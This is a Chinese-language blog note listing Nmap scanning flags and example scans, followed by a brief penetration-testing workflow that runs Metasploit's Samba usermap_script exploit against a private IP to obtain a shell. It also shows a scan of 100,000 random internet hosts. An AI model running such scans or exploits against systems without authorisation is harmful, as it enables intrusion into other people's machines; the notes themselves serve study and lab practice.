zoukankan      html  css  js  c++  java
  • Nmap

    官网资料

    这里介绍了NMAP的指令

    http://nmap.org/man/zh/

    常用指令

    操作系统的检测 -A(常用) -O

    检测主机 -sP (Ping扫描)

    端口扫描 -sS (TCP SYN扫描) -sU (效率较低,UDP扫描) -sT (当无ROOT权限时候使用,TCP connect()扫描)

    指定端口  -p 端口

    服务版本扫描 -sV (版本探测)

    输出 -oN <filespec> (标准输出) -oX <filespec> (XML输出)

     

    实例

    nmap -sV -sS -sU -p 22,53,110,143,4564 198.116.0-255.1-127

    进行主机列举和TCP扫描,对象为B类188.116网段中255个8位子网。这 个测试用于确定系统是否运行了sshd、DNS、imapd或4564端口。如果这些端口 打开,将使用版本检测来确定哪种应用在运行。并且使用TCP和UDP

    nmap -sP -O scanme.nmap.org/24

    用PING的方式扫描域名所在网段的所有主机

    nmap -v -iR 100000 -P0 -p 80

    随机选择100000台主机扫描是否运行Web服务器(80端口)。由起始阶段 发送探测报文来确定主机是否工作非常浪费时间,而且只需探测主机的一个端口,因 此使用-P0禁止对主机列表。

    nmap -sV -sS   -oN  nmap_abc  172.25.3.204

    扫描的结果保存到nmap_abc文件,默认再home目录
    nmap -sV -sS   -oX  nmap_abc  172.25.3.204

    扫描的结果保存到nmap_abc文件,默认再home目录(XML格式) 推荐

    -----------------------------------------------------------------

    step 1 explore
    tool: nmap,w3af,sqlmap,openvas...

    nmap -sV  -n 172.25.3.204
    nmap -sV -p 139 -n 172.25.3.204

    step2 search attack code,
    tool:www.exploit-db.com
         www.aol.com
         www.baidu.com

    http://www.exploit-db.com/exploits/16320/

    step3 try it
    tool:metaspolit,sqlmap

    search usermap_script
    use exploit/multi/samba/usermap_script
    show payloads
    show options
    set rhost 172.25.3.204
    exploit
    ---done-----
    whoami
    ------------

  • 相关阅读:
    sqlserver游标概念与实例全面解说
    Dos网络查看命令
    SQL Server和Access数据读写
    表中记录查询排序(设置排序规则)
    sql server中扩展存储过程
    sql server中分布式查询随笔(链接服务器(sp_addlinkedserver)和远程登录映射(sp_addlinkedsrvlogin)使用小总结)
    合并有数据的列
    防止用户同时使用一个存储过程
    (转载) 两个数据库比较 对比视图存储过程及表结构差异
    Sql Server REPLACE函数的使用
  • 原文地址:https://www.cnblogs.com/sunfan1988/p/4142815.html
Copyright © 2011-2022 走看看